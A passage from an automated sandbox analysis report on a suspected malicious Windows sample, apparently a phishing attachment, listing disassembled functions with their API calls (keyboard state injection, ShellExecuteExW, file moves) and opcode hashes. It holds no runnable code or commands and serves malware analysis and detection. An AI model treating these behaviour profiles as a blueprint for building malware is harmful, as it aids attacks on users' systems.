                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00994357
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                • API String ID: 3648134473-3128320259
                                                                • Opcode ID: 5c033acb172525ffa0a3d592ff752fb4cbba2c352adff2305807e78cea7c1e11
                                                                • Instruction ID: c2e2a11bbb26db5cf0f2f2e97536a50585faca7fcc8e62e921b5e44b61b92e41
                                                                • Opcode Fuzzy Hash: 5c033acb172525ffa0a3d592ff752fb4cbba2c352adff2305807e78cea7c1e11
                                                                • Instruction Fuzzy Hash: 720162F390420CBFE71197A4DE8AEE7776CDB08711F0005A1BB49E6051EA745E855B71
                                                                Function 009BD43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • GetSystemMetrics.USER32(0000000F), ref: 009BD47C
                                                                • GetSystemMetrics.USER32(0000000F), ref: 009BD49C
                                                                • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 009BD6D7
                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009BD6F5
                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009BD716
                                                                • ShowWindow.USER32(00000003,00000000), ref: 009BD735
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 009BD75A
                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 009BD77D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                • String ID:
                                                                • API String ID: 1211466189-0
                                                                • Opcode ID: 25f25c63f0efaaa6702e9aaa6b6c1911295b84691afa53dee18b05d32df64748
                                                                • Instruction ID: c7b10695187790ca2a5a9ae2bebe76b59b092d5a8bde4ca63fc4e526d43cc6da
                                                                • Opcode Fuzzy Hash: 25f25c63f0efaaa6702e9aaa6b6c1911295b84691afa53dee18b05d32df64748
                                                                • Instruction Fuzzy Hash: B3B19A71601219EBDF14CF68CAC57FD7BB5BF04721F088169EC489B299EB74AA50CB90
                                                                Function 00932A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0096C1C7,00000004,00000000,00000000,00000000), ref: 00932ACF
                                                                • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0096C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00932B17
                                                                • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0096C1C7,00000004,00000000,00000000,00000000), ref: 0096C21A
                                                                • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0096C1C7,00000004,00000000,00000000,00000000), ref: 0096C286
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ShowWindow
                                                                • String ID:
                                                                • API String ID: 1268545403-0
                                                                • Opcode ID: 7e75f71b4fb6a18bc74d8133f8e1bdd4155b53d5d824801ad24709c714f638ac
                                                                • Instruction ID: e960f97f04bb4fd71bece1fa662a097236cad56c6059a73243e924d93647f68c
                                                                • Opcode Fuzzy Hash: 7e75f71b4fb6a18bc74d8133f8e1bdd4155b53d5d824801ad24709c714f638ac
                                                                • Instruction Fuzzy Hash: 58412970218780ABCB358B699D9CB7B7BDAAB86310F14881DF497C65A0C674E841DF20
                                                                Function 009970C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 009970DD
                                                                  • Part of subcall function 00950DB6: std::exception::exception.LIBCMT ref: 00950DEC
                                                                  • Part of subcall function 00950DB6: __CxxThrowException@8.LIBCMT ref: 00950E01
                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00997114
                                                                • EnterCriticalSection.KERNEL32(?), ref: 00997130
                                                                • _memmove.LIBCMT ref: 0099717E
                                                                • _memmove.LIBCMT ref: 0099719B
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 009971AA
                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 009971BF
                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 009971DE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                • String ID:
                                                                • API String ID: 256516436-0
                                                                • Opcode ID: bb7e87b0a00e922c797e4a84b95c76602bd6487321dc27cf823a05e21bbab1b3
                                                                • Instruction ID: e84a1bdf4c2007f5376a9fdd9b686af52f2e01edc3c8da61c0def13e4fba2ca9
                                                                • Opcode Fuzzy Hash: bb7e87b0a00e922c797e4a84b95c76602bd6487321dc27cf823a05e21bbab1b3
                                                                • Instruction Fuzzy Hash: 93317C31A04205EBCF10DFA9DD85AAEB7B8EF85311F2441A5FD04AB256DB309E14DBA0
                                                                Function 009B61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeleteObject.GDI32(00000000), ref: 009B61EB
                                                                • GetDC.USER32(00000000), ref: 009B61F3
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009B61FE
                                                                • ReleaseDC.USER32(00000000,00000000), ref: 009B620A
                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009B6246
                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009B6257
                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,009B902A,?,?,000000FF,00000000,?,000000FF,?), ref: 009B6291
                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 009B62B1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                • String ID:
                                                                • API String ID: 3864802216-0
                                                                • Opcode ID: 4cbc5f791a3c6ff45279eb0291e46b6ee9217902f1a431b047eb6065cdcd8ea4
                                                                • Instruction ID: 1c76bca6187e39872ef1f174e119ece7e887647f8ba18c54b6e2d5b4c4a4b124
                                                                • Opcode Fuzzy Hash: 4cbc5f791a3c6ff45279eb0291e46b6ee9217902f1a431b047eb6065cdcd8ea4
                                                                • Instruction Fuzzy Hash: 22319F72114214BFEF108F54CD9AFEA3BADEF49765F040165FE08DA191C6759C41CB60
                                                                Function 0098BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memcmp
                                                                • String ID:
                                                                • API String ID: 2931989736-0
                                                                • Opcode ID: 951382a7b7baf73c70595a030a68b1505d26c8ba7d667ee37631a9edc5951a4a
                                                                • Instruction ID: 949a901247f8c4c63b3757418a231345e1c0e82cad2ac602c1278201d3e1d461
                                                                • Opcode Fuzzy Hash: 951382a7b7baf73c70595a030a68b1505d26c8ba7d667ee37631a9edc5951a4a
                                                                • Instruction Fuzzy Hash: 0521D161A413057BF204BB169D42FBF775C9E9138CF0C4025FD0596743EB28DE1583A2
                                                                Function 0099EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                  • Part of subcall function 0094FC86: _wcscpy.LIBCMT ref: 0094FCA9
                                                                • _wcstok.LIBCMT ref: 0099EC94
                                                                • _wcscpy.LIBCMT ref: 0099ED23
                                                                • _memset.LIBCMT ref: 0099ED56
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                • String ID: X
                                                                • API String ID: 774024439-3081909835
                                                                • Opcode ID: 925e6f8891c102f70db8da8c2ca2a2dfdb19ad37e9b65ba44b200a59222fae48
                                                                • Instruction ID: bbaa2f038404ca6a8340dfe6b2d7459b3a3c0edc3c4cd6bbe7f328f87c76e5c7
                                                                • Opcode Fuzzy Hash: 925e6f8891c102f70db8da8c2ca2a2dfdb19ad37e9b65ba44b200a59222fae48
                                                                • Instruction Fuzzy Hash: 41C15D716083419FCB64EF68C885B6AB7E4EF85310F14492DF8999B2A2DB70EC45CF42
                                                                Function 00931424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 71b0139f7b3df7e6a452e7f3c5362b76a02925f34e26e8c9c3473a79d345f729
                                                                • Instruction ID: 59df5c8f7aeda749912a2ce78573f2989cc3bbf231dad94d1f25098e8bd5ad01
                                                                • Opcode Fuzzy Hash: 71b0139f7b3df7e6a452e7f3c5362b76a02925f34e26e8c9c3473a79d345f729
                                                                • Instruction Fuzzy Hash: 1C715931904109EFCB04DF98CC89ABEBB79FF85324F148259F915AA261D734AA51CFA0
                                                                Function 009A6B76 Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1d90c40f9be566589947a19bb6543628eea245a58eabb9e477b73183e457d9d9
                                                                • Instruction ID: 82e2df1bd9ff4de023261103328a051206e63812eb052e9e31514271cd0a155b
                                                                • Opcode Fuzzy Hash: 1d90c40f9be566589947a19bb6543628eea245a58eabb9e477b73183e457d9d9
                                                                • Instruction Fuzzy Hash: B1619D72208300ABC710EB64CC96F6BB7A8AFD5714F544A1DF9569B2D2DA70AD04CB92
                                                                Function 009BB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsWindow.USER32(00E85388), ref: 009BB3EB
                                                                • IsWindowEnabled.USER32(00E85388), ref: 009BB3F7
                                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 009BB4DB
                                                                • SendMessageW.USER32(00E85388,000000B0,?,?), ref: 009BB512
                                                                • IsDlgButtonChecked.USER32(?,?), ref: 009BB54F
                                                                • GetWindowLongW.USER32(00E85388,000000EC), ref: 009BB571
                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 009BB589
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                • String ID:
                                                                • API String ID: 4072528602-0
                                                                • Opcode ID: 61f3bc1cda74f58ba00b9c7d3bec1a7173741b195cb6fb9b5739c9e67af5bca4
                                                                • Instruction ID: 1712071644c642480ad316e25451d12f529d99ec32fd8382e083ab9d0df64207
                                                                • Opcode Fuzzy Hash: 61f3bc1cda74f58ba00b9c7d3bec1a7173741b195cb6fb9b5739c9e67af5bca4
                                                                • Instruction Fuzzy Hash: 94719B34605204EFDB349F54CAA4FFABBAAFF49320F144159FA46972A2C7B5A840DB50
                                                                Function 009AF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 009AF448
                                                                • _memset.LIBCMT ref: 009AF511
                                                                • ShellExecuteExW.SHELL32(?), ref: 009AF556
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                  • Part of subcall function 0094FC86: _wcscpy.LIBCMT ref: 0094FCA9
                                                                • GetProcessId.KERNEL32(00000000), ref: 009AF5CD
                                                                • CloseHandle.KERNEL32(00000000), ref: 009AF5FC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                • String ID: @
                                                                • API String ID: 3522835683-2766056989
                                                                • Opcode ID: c7f2e3e79d27f49f81e61cb3b7e53531f86f6e2866dbbb88b80c6188a49f41c0
                                                                • Instruction ID: 08a624b34805dfe5b548a16f285570146db88b7dfaee3ad3e3019d98aa004b85
                                                                • Opcode Fuzzy Hash: c7f2e3e79d27f49f81e61cb3b7e53531f86f6e2866dbbb88b80c6188a49f41c0
                                                                • Instruction Fuzzy Hash: 57618F75A006199FCB14DFA8C895AAEFBF5FF89310F148469E859AB351CB30AD41CF90
                                                                Function 00990F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetParent.USER32(?), ref: 00990F8C
                                                                • GetKeyboardState.USER32(?), ref: 00990FA1
                                                                • SetKeyboardState.USER32(?), ref: 00991002
                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00991030
                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 0099104F
                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00991095
                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 009910B8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                • String ID:
                                                                • API String ID: 87235514-0
                                                                • Opcode ID: fbed19db85b52dd3621cd805fc5d51edd7e32f8eb07acbc7981bd9ac42a592c2
                                                                • Instruction ID: 6eaa128c3da0c33bc85219e11a8360d0691ffcb15cff369630181927ccd2b3be
                                                                • Opcode Fuzzy Hash: fbed19db85b52dd3621cd805fc5d51edd7e32f8eb07acbc7981bd9ac42a592c2
                                                                • Instruction Fuzzy Hash: 6351F4605087D63EFF36463C8C15BBABEAD6B46304F088589E1E4458D3C2DAEDC9D761
                                                                Function 00990D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetParent.USER32(00000000), ref: 00990DA5
                                                                • GetKeyboardState.USER32(?), ref: 00990DBA
                                                                • SetKeyboardState.USER32(?), ref: 00990E1B
                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00990E47
                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00990E64
                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00990EA8
                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00990EC9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                • String ID:
                                                                • API String ID: 87235514-0
                                                                • Opcode ID: 5dc2ce9f550d156d29e82677cbd8cd97fb2e8acd54d28b5af9fcb1fe5026d4b7
                                                                • Instruction ID: 15fab28e8ad2898e2c837c5b235bbed14cced0569ec6d60e53fe31e5252b568a
                                                                • Opcode Fuzzy Hash: 5dc2ce9f550d156d29e82677cbd8cd97fb2e8acd54d28b5af9fcb1fe5026d4b7
                                                                • Instruction Fuzzy Hash: 0451E5A05187D53DFF3297788C55B7A7FAD6B86300F088989F1E4468C2C395AD98E760
                                                                Function 009955FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _wcsncpy$LocalTime
                                                                • String ID:
                                                                • API String ID: 2945705084-0
                                                                • Opcode ID: e657313103afc47efa6ef84ac87747dc660c17ec4a1c96a35d1cbc0c43040c83
                                                                • Instruction ID: 04c2757b2ff3fc8b823e4070a4bbbbccde84b408ec6c4796ab8eba0fd26909a1
                                                                • Opcode Fuzzy Hash: e657313103afc47efa6ef84ac87747dc660c17ec4a1c96a35d1cbc0c43040c83
                                                                • Instruction Fuzzy Hash: 66419266C1061476CB12EBF98C46ACFB3BC9F45311F508956F918E3221FB34A389C7A6
                                                                Function 00993671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0099466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00993697,?), ref: 0099468B
                                                                  • Part of subcall function 0099466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00993697,?), ref: 009946A4
                                                                • lstrcmpiW.KERNEL32(?,?), ref: 009936B7
                                                                • _wcscmp.LIBCMT ref: 009936D3
                                                                • MoveFileW.KERNEL32(?,?), ref: 009936EB
                                                                • _wcscat.LIBCMT ref: 00993733
                                                                • SHFileOperationW.SHELL32(?), ref: 0099379F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                • String ID: \*.*
                                                                • API String ID: 1377345388-1173974218
                                                                • Opcode ID: c2f127606db5df65958e991be7cec34d7a0f1cc12710d4886d66387fccbc9f5e
                                                                • Instruction ID: e67ddd87ba80a0f942c230f67a0a6cdd1abaa8896d0fe5bd1c8ebeb26ac96172
                                                                • Opcode Fuzzy Hash: c2f127606db5df65958e991be7cec34d7a0f1cc12710d4886d66387fccbc9f5e
                                                                • Instruction Fuzzy Hash: 2D417471508344AECB52EF68D442ADFB7ECEF89390F40492EF499C3151EA34D689CB56
                                                                Function 009B7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                Download Yara Rule
                                                                APIs
